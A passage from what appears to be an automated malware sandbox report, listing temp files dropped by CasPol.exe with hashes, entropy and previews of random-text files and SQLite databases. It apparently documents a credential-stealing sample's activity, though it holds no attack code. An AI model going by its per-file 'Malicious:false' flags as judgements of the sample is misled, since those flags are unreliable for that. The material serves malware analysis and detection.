                                                                                          Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67A6.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.696178193607948
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                          MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                          SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                          SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                          SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                          Malicious:false
                                                                                          Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67B6.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.697358951122591
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                          MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                          SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                          SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                          SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                          Malicious:false
                                                                                          Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67B7.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.6998645060098685
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                          MD5:1676F91570425F6566A5746BC8E8427E
                                                                                          SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                          SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                          SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                          Malicious:false
                                                                                          Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67D8.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67E8.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp6808.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp7DB5.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp7E04.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA021.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA031.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA032.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA053.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA063.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA084.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpA094.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpB419.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpD83F.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmpD85F.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
